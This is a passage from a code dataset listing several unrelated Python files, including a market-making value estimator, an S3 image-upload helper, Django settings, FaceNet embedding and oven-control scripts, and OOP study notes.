1,\n lo_intensity_ask: float = 1,\n bid_fill_prob: float = 100, # Check whether we can evaluate pdf/cdf directly\n ask_fill_prob: float = 100, # Check whether we can evaluate pdf/cdf directly\n max_running_penalty: float = 0.01, # Check this to make sure it kinda makes sense\n liquidation_penalty: float = 100, # Check this to make sure it kinda makes sense, but needs to be high\n accumulated_penalty: float = 0.0):\n self.mid_price = mid_price # measurable\n self.agent_position = agent_position # agent-driven\n self.agent_cash = agent_cash # agent-driven\n # Use this in the actual value function, rather than the estimate\n self.accumulated_penalty = accumulated_penalty # agent-driven\n self.qty_high_bound = qty_high_bound # agent-driven\n self.qty_low_bound = qty_low_bound # agent-driven\n self.sig_fig = sig_fig # agent-driven\n self.lo_intensity_bid = lo_intensity_bid # secondary measure from LOB\n self.lo_intensity_ask = lo_intensity_ask # secondary measure from LOB\n self.bid_fill_prob = bid_fill_prob # agent-driven\n self.ask_fill_prob = ask_fill_prob # agent-driven\n self.max_running_penalty = max_running_penalty\n self.liquidation_penalty = liquidation_penalty\n self.time_to_eod = time_to_eod\n\n @property\n def quantity_space(self):\n return np.linspace(self.qty_low_bound, self.qty_high_bound, num=int(1 / self.sig_fig))\n\n @property\n def est_log_penalized_value(self, is_bid_side=True) -> np.ndarray:\n # w(t, q) = exp(A) * z\n fill_prob = self.bid_fill_prob if is_bid_side else self.ask_fill_prob\n qty = self.quantity_space\n z = np.fromiter((np.exp(-self.max_running_penalty * fill_prob * quantity ** 2) for quantity in qty), np.float)\n exp_a = np.zeros((len(qty), len(qty)))\n\n for i in range(len(qty)):\n for j in range(len(qty)):\n exp_a[i, j] = np.exp(- self.max_running_penalty * fill_prob * qty[i] if i == j else\n self.lo_intensity_bid / np.exp(1) if i + 1 == j else\n self.lo_intensity_ask / np.exp(1) if i - 1 == j else\n 0)\n\n return exp_a @ z\n\n def est_running_penalty(self, bump: float = np.random.rand()) -> float:\n eta, zeta = 0.5, 0.5\n\n # h+/-(t, q) = w+/-(t, q) * exp(T - t) / k+/-\n h_bid = self.est_log_penalized_value(is_bid_side=True) * np.exp(self.time_to_eod) / self.bid_fill_prob\n h_ask = self.est_log_penalized_value(is_bid_side=False) * np.exp(self.time_to_eod) / self.ask_fill_prob\n\n return (eta * h_bid + zeta * h_ask) * (1 + bump)\n\n def est_value_fn(self) -> float:\n eod_penalty = 0 if self.time_to_eod > 0 else self.liquidation_penalty * self.agent_position ** 2\n\n running_penalty = interp1d(self.quantity_space, self.est_running_penalty(), kind='cubic')\n return (self.agent_cash + self.agent_position * self.mid_price\n - self.max_running_penalty * running_penalty(self.agent_position) - eod_penalty)\n\n\nclass PenaltyNetwork(nn.Module):\n\n def __init__(self, input_size, output_size):\n super(PenaltyNetwork, self).__init__()\n self.layer_in = nn.Linear(input_size, 32)\n self.layer_1 = nn.Linear(32, 32)\n self.layer_out = nn.Linear(32, output_size)\n\n def forward(self, x):\n out_1 = F.relu(self.layer_in(x))\n out_2 = F.relu(self.layer_1(out_1))\n out_3 = self.layer_out(out_2)\n return out_3\n\n\nclass ValueNetEstimator:\n\n def __init__(self,\n readers: List[LOBSTERReader],\n qty_low_bound: int,\n qty_high_bound: int,\n max_cash: float,\n neural_net: nn.Module,\n loss_fn=nn.MSELoss,\n sig_fig: float = 0.001):\n self.qty_low_bound = qty_low_bound\n self.qty_high_bound = qty_high_bound\n self.max_cash = max_cash\n self.readers = readers\n self.network = neural_net\n self.loss_fn = loss_fn\n self.sig_fig = sig_fig\n\n @staticmethod\n def _targets(training_input: np.ndarray) -> np.ndarray:\n return np.fromiter((state.est_value_fn() for state in training_input), np.float)\n\n @staticmethod\n def _parse_states(readers: List[LOBSTERReader], qty_low_bound: int, qty_high_bound: int, max_cash: float) -> List[\n AgentState]:\n assert len(set([reader.ticker_str for reader in readers])) == 1\n\n states = list()\n for reader in readers:\n # Get all mid prices\n eod_time = reader.time_end - reader.time_start\n dataset = reader.mid_prices_over_time(reader.num_levels, 0, eod_time)\n qtys = np.linspace(qty_low_bound, qty_high_bound + 1, 1)\n cash = np.linspace(0, max_cash, 1)\n fill_prob = np.linspace(1, 100, 1)\n max_running_penalty = np.linspace(1, 10, 1)\n\n # Investigate use of Cython for this\n for qty, cash, fill, max_penalty in zip(qtys, cash, fill_prob, max_running_penalty):\n # We can train up the agent so that k+/- are the same. Exploration of RL agent can help with unequal\n # scenarios, given the lack of an explicit model. We also need to estimate low and high intensity from\n # the environment.\n states += [AgentState(price, qty, cash, time, qty_high_bound, qty_low_bound, lo_intensity_ask=buy_mo,\n lo_intensity_bid=sell_mo, bid_fill_prob=fill, ask_fill_prob=fill,\n max_running_penalty=10 ** -max_penalty)\n for price, time, buy_mo, sell_mo in zip(dataset['Mid Prices'], dataset['Time'],\n dataset['Buy Intensity'], dataset['Sell Intensity'])]\n return states\n\n def train(self, steps: int):\n start_time = t.time()\n training_input = self._parse_states(self.readers, self.qty_low_bound, self.qty_high_bound, self.max_cash)\n print('Parsed Training Data in {} sec'.format(t.time() - start_time))\n targets = self._targets(training_input)\n print('Calculated Targets in {} sec'.format(t.time() - start_time))\n for step in range(steps):\n loop_time = t.time()\n output = [self.network(train_in) for train_in in training_input]\n loss = self.loss_fn(list(targets), output)\n loss.backward()\n for param in self.network.parameters():\n param.data.add_(- param.grad / steps)\n param.grad.data.zero_()\n print('Calibrated {}th step in {} sec'.format(step, t.time() - loop_time))","sub_path":"lobpy/datareader/ml_env.py","file_name":"ml_env.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"461943688","text":"import sys\nsys.path.append(\"./spikerlib.egg\")\nfrom spikerlib.metrics import modulus_metric as mm\nimport numpy as np\nimport multiprocessing as mp\n\n\ndef call_interval_mm(record):\n id = record[\"id\"]\n inspikes = record[\"inspikes\"]\n outspikes = record[\"outspikes\"]\n modulus = np.mean(mm.interval(inspikes, outspikes, 0, 5, mp=False))\n return {\"id\": id, \"modulus\": modulus}\n\nspikes = np.load(\"2014-01-31_spikes.npz\")[\"data\"]\n_num_items = len(spikes)\npool = mp.Pool()\nmodulus_iter = pool.imap(call_interval_mm, spikes)\nprint(\"Starting calculation of modulus ...\")\nmodulus = []\nfor idx, mod_item in enumerate(modulus_iter, 1):\n modulus.append(mod_item)\n print(\"%i/%i complete ...\" % (idx, _num_items))\nprint(\"Calculation complete. Saving to modulus.npz\")\nnp.savez(\"modulus.npz\", data=modulus)\nprint(\"DONE!\")\n\n","sub_path":"grid_modulus.py","file_name":"grid_modulus.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"574780127","text":"# https://leetcode.com/problems/unique-paths-ii/\n\nclass Solution(object):\n def uniquePathsWithObstacles(self, obstacleGrid):\n \"\"\"\n :type obstacleGrid: List[List[int]]\n :rtype: int\n\n dp(i,j) = dp(i-1,j) + dp(i, j-1) if grid[i][j] != 1\n else 0\n \"\"\"\n m = len(obstacleGrid)\n if m == 0:\n return 0\n n = len(obstacleGrid[0])\n dp = [0, 1] + [0] * (n-1)\n\n for i in range(0, m):\n for j in range(1, n+1):\n dp[j] = dp[j-1] + dp[j] if obstacleGrid[i][j] == 0 else 0\n\n return dp[n]\n\n","sub_path":"leetcode/python/unique-paths-ii.py","file_name":"unique-paths-ii.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"375631787","text":"import json\nimport os\n\nimport requests\nfrom werkzeug.utils import secure_filename\n\nfrom app.services.extensions import s3\nfrom config import Config\n\n\ndef upload_file_s3(image, aws_key, filename=0):\n try:\n filename_from_image = secure_filename(image.filename)\n os_filename, os_file_extension = os.path.splitext(filename_from_image)\n if filename == 0:\n filename = f\"{os_filename}{os_file_extension}\"\n else:\n filename = f\"{filename}{os_file_extension}\"\n except:\n if filename == 0:\n filename = secure_filename(image.filename)\n\n path = f\"{aws_key}/original/{filename}\"\n\n api_endpoint = 'https://api.kraken.io/v1/upload'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36'\n }\n files = {\n 'file': image\n }\n params = {\n \"auth\": {\n \"api_key\": Config.KRAKEN_API_KEY,\n \"api_secret\": Config.KRAKEN_API_SECRET\n },\n \"s3_store\": {\n \"key\": Config.AWS_ACCESS_KEY_ID,\n \"secret\": Config.AWS_SECRET_ACCESS_KEY,\n \"bucket\": Config.AWS_BUCKET,\n \"region\": Config.AWS_BUCKET_LOCATION\n },\n \"wait\": True,\n \"resize\": [\n {\n \"id\": \"original\",\n \"strategy\": \"none\",\n \"storage_path\": path.lower()\n },\n {\n \"id\": \"small\",\n \"strategy\": \"auto\",\n \"width\": 180,\n \"height\": 180,\n \"storage_path\": path.replace('original', 'small').lower()\n },\n {\n \"id\": \"medium\",\n \"strategy\": \"auto\",\n \"width\": 450,\n \"height\": 450,\n \"storage_path\": path.replace('original', 'medium').lower()\n },\n {\n \"id\": \"large\",\n \"strategy\": \"auto\",\n \"width\": 850,\n \"height\": 850,\n \"storage_path\": path.replace('original', 'large').lower()\n }\n ]\n }\n\n r = requests.post(url=api_endpoint, headers=headers, files=files, data={\n 'data': json.dumps(params)\n })\n\n r_json = r.json()\n success = r_json['success']\n\n if success:\n r_json['image_key'] = path.lower()\n return r_json\n\n\ndef delete_file_s3(key):\n client = s3\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key)\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key.replace('original', 'small'))\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key.replace('original', 'medium'))\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key.replace('original', 'large'))\n\n return True\n\n\ndef get_aws_image_keys(key):\n if key is not None:\n assert isinstance(key, str), \"\\\"key\\\" must be a string;.\"\n\n return {\n \"original\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key}\",\n \"small\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'small')}\",\n \"medium\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'medium')}\",\n \"large\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'large')}\"\n }\n else:\n return {\n \"original\": None,\n \"small\": None,\n \"medium\": None,\n \"large\": None\n }\n\n\ndef get_aws_image_keys_private(key):\n if key is not None:\n assert isinstance(key, str), \"\\\"key\\\" must be a string;.\"\n\n return {\n \"original\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key}\",\n \"small\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'small')}\",\n \"medium\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'medium')}\",\n \"large\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'large')}\"\n }\n else:\n return {\n \"original\": None,\n \"small\": None,\n \"medium\": None,\n \"large\": None\n }\n","sub_path":"sensi-backend-init/app/services/aws/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455073239","text":"from .base import *\n\n\nsecrets = json.loads(open(os.path.join(SECRET_DIR, 'production.json')).read())\n\nDEBUG = False\n\n# Django-storages\nINSTALLED_APPS += [\n 'storages',\n]\n\nALLOWED_HOSTS = [\n 'localhost'\n]\n\nDEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'\nSTATICFILES_STORAGE = 'config.storages.S3StaticStorage'\n\nAWS_ACCESS_KEY_ID = secrets['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = secrets['AWS_SECRET_ACCESS_KEY']\nAWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']\nAWS_DEFAULT_ACL = secrets['AWS_DEFAULT_ACL']\nAWS_S3_REGION_NAME = secrets['AWS_S3_REGION_NAME']\nAWS_S3_SIGNATURE_VERSION = secrets['AWS_S3_SIGNATURE_VERSION']\n\n# Static\nSTATIC_ROOT = os.path.join(ROOT_DIR, '.static')\nMEDIA_ROOT = os.path.join(ROOT_DIR, '.media')\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\n# WSGI\nWSGI_APPLICATION = 'config.wsgi.production.application'\n\n# DB\nDATABASES = secrets['DATABASES']\n","sub_path":"app/config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206187580","text":"# Copyright 2018 The Imaging Source Europe GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom tcam_capture.PropertyWidget import PropertyWidget\n\nfrom PyQt5.QtCore import QSizeF, QPoint\n\n\nclass ROIGroup(object):\n \"\"\"\"\"\"\n def __init__(self):\n \"\"\"\"\"\"\n self.name = \"\"\n # list of members\n self.member_names = []\n # list of matching PropertyWidgets\n self.properties = []\n # color the border should have\n self.border_color = \"red\"\n\n def is_complete(self):\n \"\"\"\n Returns True if all members are available\n \"\"\"\n if len(self.member_names) != len(self.properties):\n return False\n\n # Check if we really have all properties\n for name in self.member_names:\n if not any(name == prop.prop.name for prop in self.properties):\n return False\n\n return True\n\n def add_member_maybe(self, prop: PropertyWidget):\n \"\"\"\n Check if property is an expected member and add it if so\n Returns True if property is a member\n \"\"\"\n if prop.prop.name in self.member_names:\n self.properties.append(prop)\n return True\n return False\n\n def set_position(self, x: int, y: int):\n\n for prop in self.properties:\n if \"Top\" in prop.prop.name:\n prop.set_property(int(y), False)\n elif \"Left\" in prop.prop.name:\n prop.set_property(int(x), False)\n\n def set_size(self, width: int, height: int):\n\n for prop in self.properties:\n if \"Width\" in prop.prop.name:\n prop.set_property(int(width), False)\n elif \"Height\" in prop.prop.name:\n prop.set_property(int(height), False)\n\n def get_position(self):\n\n x = 0\n y = 0\n\n for prop in self.properties:\n\n if \"Left\" in prop.prop.name:\n x = prop.prop.value\n elif \"Top\" in prop.prop.name:\n y = prop.prop.value\n\n return QPoint(x, y)\n\n def get_size(self):\n\n width = 0\n height = 0\n\n for prop in self.properties:\n\n if \"Width\" in prop.prop.name:\n width = prop.prop.value\n elif \"Height\" in prop.prop.name:\n height = prop.prop.value\n\n return QSizeF(width, height)\n\n def get_min_size(self):\n \"\"\"\n Return a QSizeF containing the minimum size this ROI must have\n \"\"\"\n width = 0\n height = 0\n\n for prop in self.properties:\n\n if \"Width\" in prop.prop.name:\n width = prop.prop.minval\n elif \"Height\" in prop.prop.name:\n height = prop.prop.minval\n\n return QSizeF(width, height)\n\n def get_max_size(self):\n \"\"\"\n Return the maximum possible size the ROI can have\n \"\"\"\n width = 0\n height = 0\n\n for prop in self.properties:\n\n if \"Width\" in prop.prop.name:\n width = prop.prop.maxval\n elif \"Height\" in prop.prop.name:\n height = prop.prop.maxval\n\n return QSizeF(width, height)\n\n @staticmethod\n def get_all_groups():\n \"\"\"\n Returns a list of all possible ROIGroups\n \"\"\"\n roi_list = []\n\n exp1 = ROIGroup()\n exp1.name = \"Exposure ROI\"\n exp1.member_names = [\"Exposure ROI Left\", \"Exposure ROI Top\",\n \"Exposure ROI Width\", \"Exposure ROI Height\"]\n roi_list.append(exp1)\n\n focus = ROIGroup()\n focus.name = \"Focus ROI\"\n focus.member_names = [\"Focus ROI Left\", \"Focus ROI Top\",\n \"Focus ROI Width\", \"Focus ROI Height\"]\n focus.border_color = \"blue\"\n roi_list.append(focus)\n\n # devices like the DFK33 UX250 have this\n auto_roi = ROIGroup()\n auto_roi.name = \"Auto Functions ROI\"\n auto_roi.member_names = [\"Auto Functions ROI Left\", \"Auto Functions ROI Top\",\n \"Auto Functions ROI Width\", \"Auto Functions ROI Height\",\n \"Auto Functions ROI Control\", \"Auto Functions ROI Preset\"]\n auto_roi.border_color = \"green\"\n roi_list.append(auto_roi)\n\n return roi_list\n","sub_path":"tools/tcam-capture/tcam_capture/ROIGroup.py","file_name":"ROIGroup.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"462996262","text":"import pytest\n\n\n@pytest.fixture()\ndef setUp():\n print(\"--Before test: \")\n yield\n print(\"--After test! \")\n\n\n@pytest.fixture(scope=\"class\")\ndef oneTimeSetUp(browser, request):\n print(\"--Running once time setUp\")\n if browser == 'firefox':\n value = 10\n print(\"Run test on Firefox\")\n else:\n value = 20\n print(\" Run test on Chrome\")\n if request.cls is not None:\n request.cls.value = value\n yield value\n print(\"--Running once time tearDown\")\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\", help=\"enter browser\")\n parser.addoption(\"--ostype\", help=\"type of operating system\")\n\n\n@pytest.fixture(scope=\"session\")\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n\n@pytest.fixture(scope=\"session\")\ndef ostype(request):\n return request.config.getoption(\"--ostype\")\n\n","sub_path":"pytestpackage/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"509242782","text":"\"\"\"\n1, 2, 3\n\"asdf\"\ntrue/false\n\"\"\"\n\neggs = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# read\nprint(eggs[3])\n# add\neggs.append(99)\n# update\neggs[4] = 55\n\nfor x in eggs:\n print(x*2)\n\n","sub_path":"other/sandbox/abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"584806063","text":"import argparse\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport json\nimport facenet\nimport compare\nimport sys\n\ndef np2embeddings(img_np, model):\n print('Calculating embedding')\n with tf.Graph().as_default():\n tfconfig = tf.ConfigProto()\n tfconfig.gpu_options.allow_growth = True\n sess = tf.Session(config=tfconfig)\n with sess.as_default():\n facenet.load_model(model)\n # Get input and output tensors\n images_placeholder = tf.get_default_graph().get_tensor_by_name(\"input:0\")\n embeddings = tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n phase_train_placeholder = tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n feed_dict = { images_placeholder: img_np, phase_train_placeholder:False }\n emb = sess.run(embeddings, feed_dict=feed_dict)\n return emb\n\n\ndef main(args):\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n batch_size = 1000\n img_names = os.listdir(args.input_dir)\n img_names.sort()\n n_img = len(img_names)\n img_names_this_batch = []\n for i, img_name in enumerate(img_names):\n img_names_this_batch.append(img_name)\n if i % batch_size == batch_size - 1 or i == n_img - 1:\n i_batch = int(i / batch_size)\n i_batch_str = str(i_batch).zfill(3)\n print(\"Processing batch {}\".format(i_batch))\n img_paths_this_batch = [os.path.join(args.input_dir, img_name_this_batch) \\\n for img_name_this_batch in img_names_this_batch ]\n # The corresponding image path is removed if face alignment fails.\n imgs_np = compare.load_and_align_data(img_paths_this_batch, 160, 32, 0.8)\n img_names_this_batch = [os.path.basename(img_path_this_batch) \\\n for img_path_this_batch in img_paths_this_batch ]\n emb = np2embeddings(imgs_np, args.model)\n img_names_output = os.path.join(output_dir, 'img_names_{}.txt'.format(i_batch_str))\n embeddings_output = os.path.join(output_dir, 'embeddings_{}'.format(i_batch_str))\n with open(img_names_output, 'w') as fout:\n path_names = {'path': args.input_dir, 'names': img_names_this_batch}\n fout.write(json.dumps(path_names, indent=4))\n np.save(embeddings_output, emb)\n img_names_this_batch = []\n print('Done')\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('model', type=str,\n help='Could be either a directory containing the meta_file and ckpt_file or a model protobuf (.pb) file')\n parser.add_argument('input_dir', type=str, help='Directory with raw images')\n parser.add_argument('output_dir', type=str, help='Output numpy array for embeddings')\n return parser.parse_args(argv)\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))","sub_path":"misc/align_and_embed_batch.py","file_name":"align_and_embed_batch.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"334644705","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n面向对象编程\n\n# 继承\n# 类属性 定义了一个类属性后,这个属性虽然归类所有,但类的所有实例都可以访问到\n# 当我们定义了一个class,创建了一个class的实例后,我们可以给该实例绑定任何属性和方法\n# 如果我们想要限制实例的属性怎么办?比如,只允许对Student实例添加name和age属性\n 为了达到限制的目的,Python允许在定义class的时候,定义一个特殊的__slots__变量,来限制该class实例能添加的属性\n __slots__定义的属性仅对当前类实例起作用,对继承的子类是不起作用的,除非在子类中也定义__slots__\n# 在绑定属性时,如果我们直接把属性暴露出去,虽然写起来很简单,但是,没办法检查参数,导致可以把成绩随便改\n 为了限制score的范围,可以通过一个set_score()方法来设置成绩,再通过一个get_score()来获取成绩,这样,\n 在set_score()方法里,就可以检查参数,Python内置的@property装饰器就是负责把一个方法变成属性调用的\n\"\"\"\n\nclass Human():\n count = 0; # 类属性 定义了一个类属性后,这个属性虽然归类所有,但类的所有实例都可以访问到\n def __init__(self):\n self.name = \"Human\";\n Human.count = Human.count + 1; #没新建一个实例 类属性count 加1\n pass;\n\n def run(self):\n print(\"Human is running!\");\n\n def eat(self):\n print(\"Human is eating!\");\n\n\n# Man Woman 继承Human类,并重写run方法\nclass Man(Human):\n def run(self):\n print(\"Man is running!\");\n\n\nclass Woman(Human):\n def run(self):\n print(\"Woman is running!\");\n\n\nclass Student():\n __slots__ = ('name',\"age\",\"score\");\n def __init__(self):\n self.score=0;\n\n def get_score(self):\n return self._score;\n\n def set_score(self, value):\n if not isinstance(value, int):\n raise ValueError('score must be an integer!')\n if value < 0 or value > 100:\n raise ValueError('score must between 0 ~ 100!')\n self._score = value\n\n @property\n def score2(self):\n return self._score;\n\n @score2.setter\n def score2(self, value):\n if not isinstance(value, int):\n raise ValueError('score must be an integer!')\n if value < 0 or value > 100:\n raise ValueError('score must between 0 ~ 100!')\n self._score = value\n\n def __str__(self):\n return \"score: %s\"% self._score;\n __repr__ = __str__\n pass;\n\ndef fn():\n pass;\n\ndef set_age(self,age):\n self.age = age;\n\nif __name__ == '__main__':\n man = Man();\n man.run();\n man.eat();\n\n #获取对象信息\n\n #type() 获取类型\n print(type(123));\n print(type(\"ABC\"));\n print(type(None));\n print(type(man));\n print(type(abs));\n\n # 判断基本数据类型可以直接写int,str等,但如果要判断一个对象是否是函数怎么办?可以使用types模块中定义的常量\n import types;\n print(type(fn)==types.FunctionType)\n print(type(abs) == types.BuiltinFunctionType)\n print(type(lambda x :x) == types.LambdaType)\n\n print(\"---isinstance---\");\n # isinstance() 判断class的类型\n woman = Woman();\n\n print(isinstance(woman, Human));\n print(isinstance(woman, Woman));\n print(isinstance(woman, Man));\n\n print(\"---dir---\");\n # dir() 获得一个对象的所有属性和方法\n print(dir(Human));\n\n # 配合getattr()、setattr()以及hasattr(),我们可以直接操作一个对象的状态\n print(hasattr(woman,\"name\")); #是否有name属性\n print(hasattr(woman, \"y\")); # 是否有name属性\n print(getattr(woman, \"name\")); # 获取name属性值\n print(setattr(woman, \"name\",\"Woman\")); # 设置name属性\n print(woman.name);\n print(getattr(woman, \"name\"));\n\n # 如果试图获取不存在的属性,会抛出AttributeError的错误\n #print(getattr(woman,\"y\")); # 抛出AttributeError的错误\n\n #可以传入一个default参数,如果属性不存在,就返回默认值\n print(getattr(woman,\"y\",404));\n\n print(\"---测试类属性---\");\n #\n human = Human();\n human2 = Human();\n print(Human.count) # 4\n\n # 给实例绑定一个方法\\属性\n s = Student();\n s.name = \"Stu1\";\n print(s.name);\n from types import MethodType;\n s.setAge = MethodType(set_age,s);\n s.setAge(25);\n print(s.age);\n # 给一个实例绑定的方法,对另一个实例是不起作用的\n s2 = Student();\n #s2.setAge(25); # AttributeError\n\n # 为了给所有实例都绑定方法,可以给class绑定方法\n Student.setAge = set_age;\n s2.setAge(50);\n\n print(\"---slots---\")\n s3 = Student();\n s3.name = \"S3\"; # ok\n s3.age = 25; # ok\n # s3.sex = 50; # AttributeError\n\n print(\"---property---\")\n s3.set_score(60);\n print(s3.get_score());\n s3.score2 = 80;\n print(s3.score2);\n\n print(\"---__str__---\")\n print(s3.__repr__());","sub_path":"PycharmProjects/DataAnalysis/study/object_class.py","file_name":"object_class.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"22574490","text":"import sys\n\nsys.path.append('/home/pi/Desktop/py/')\nfrom time import sleep\nimport datetime\nimport TTC4006_Tira\nimport Impedanz_4192A_Eth\nfrom TempProfile import readTempProfile\nimport bme280\nimport time\nimport detect_file\nimport relay\nimport write_display\nimport os\nimport data_storage\nimport PID\n\nimport threading\nfrom threading import Thread\n\n# FILE_NAME = \"/media/pi/B49E-19751/Temperature_profile.txt\"\nfolder = \"/media/pi/\"\nTTC_SERIAL_PORT = \"/dev/ttyUSB1\"\nTTC_SERIAL_BAUD = 19200\nTTC_ADDRESS = 17\nIMP_IP = \"169.254.80.115\"\nIMP_PORT = 1234\nNX_SERIAL_PORT = \"/dev/ttyUSB0\" # COM7\nI2C_address = 0x76\n\nDIS = write_display.Nextion(NX_SERIAL_PORT)\n\ncommand_sample = \"get n123.val\\xff\\xff\\xff\"\n\nAPP_OVEN_PRESENT = True\nAPP_IMP_PRESENT = True\nAPP_BME_280_PRESENT = True\nAPP_NEXTION_PRESENT = True\nAPP_PEN_DRIVE = True\n\n# HUMIDITY SENSOR PARAMETERS\nBME_280_INVALID_TEMP = -273\nBME_280_INVALID_HUMI = -273\n\n# RELAY PARAMETERS\nRELAY_HOLDING_TIME = 1.94\n\n\nclass OvenThread(Thread):\n def __init__(self, TP, Father, RE_VAL):\n Thread.__init__(self)\n # import oven and multimeter\n if APP_OVEN_PRESENT:\n self.OVEN = TTC4006_Tira.TTC4006(TTC_SERIAL_PORT)\n self.OVEN.TTC_ON()\n self.OVEN.TTC_ENABLE_TEMP()\n\n self.TP = TP\n self.RE_VAL = RE_VAL\n\n # set PID parameters\n self.P = 5\n self.I = 0\n self.D = 0\n\n self.pid = PID.PID(self.P, self.I, self.D)\n self.pid.setSampleTime(1)\n\n self.lock = threading.Lock()\n\n self.Father = Father\n\n self.t1 = 0\n self.t2 = 0\n self.t3 = 0\n\n def getTimes(self):\n return [self.t1,self.t2,self.t3]\n\n def getStepNum(self):\n return self.step_counter\n\n def getStep(self):\n return self.step\n\n def run(self):\n self.step_counter = 0\n for step in self.TP:\n self.lock.acquire()\n self.step = step\n self.lock.release()\n\n # setting the oven\n t_start = time.time()\n step_time = self.step[0] * 60 # step_time in seconds\n step_temp = float(format(float(self.step[1]) / 0.84, \".2f\"))\n print(self.step)\n\n self.lock.acquire()\n self.t1 = datetime.datetime.now()\n self.t2 = datetime.datetime.now() + datetime.timedelta(seconds=step_time)\n self.t3 = datetime.datetime.now() + datetime.timedelta(seconds=1 * 60)\n self.lock.release()\n\n while self.t1 < self.t2:\n # run time\n t_step = time.time()\n t_run = format(t_step - t_start, \"0.2f\")\n\n if APP_OVEN_PRESENT:\n # run oven)\n print(\"01 - Reading data from Oven...\")\n temp_real = self.OVEN.TTC_Read_PV_Temp()\n temp_set = self.OVEN.TTC_Read_SP_Temp()\n else:\n temp_set = format(1.00, \"0.2f\")\n temp_real = format(1.00, \"0.2f\")\n\n self.pid.SetPoint = step_temp\n self.pid.setKp(float(self.P))\n self.pid.setKi(float(self.I))\n self.pid.setKd(float(self.D))\n\n # read temperature sensor\n # Humidity Sensor\n # If is not OK => apply non valid temp and humidity\n print(\"02 - Reading data from Humidity Sensor...\")\n if APP_BME_280_PRESENT:\n try:\n temperature, pressure, humidity = bme280.readBME280All()\n\n # Medicine\n if (humidity == None) or (temperature == None):\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n print(\"02 - Reading data from Humidity Sensor (NONE! - ERROR)...\")\n elif (type(humidity) == str) or (type(temperature) == str):\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n print(\"02 - Reading data from Humidity Sensor (INVALID STRING! - ERROR)...\")\n\n except:\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n print(\"02 - Reading data from Humidity Sensor (INVALID STRING! - ERROR)...\")\n\n else:\n print(\"02 - Reading data from Humidity Sensor (DISABLED)...\")\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n\n HUMI_sensor = format(humidity, \"0.2f\")\n TEMP_sensor = format(temperature, \"0.2f\")\n print(\"02 - Reading data from Humidity Sensor: Temp(oC): \", TEMP_sensor)\n print(\"02 - Reading data from Humidity Sensor: Humi(%): \", HUMI_sensor)\n\n print(\"Sensor Temperature : \", str(TEMP_sensor))\n\n self.pid.update(float(TEMP_sensor))\n\n target_temperature = self.pid.output\n\n # Limit Extremes\n if target_temperature > 130:\n target_temperature = 130\n elif target_temperature < -40:\n target_temperature = -40\n else:\n 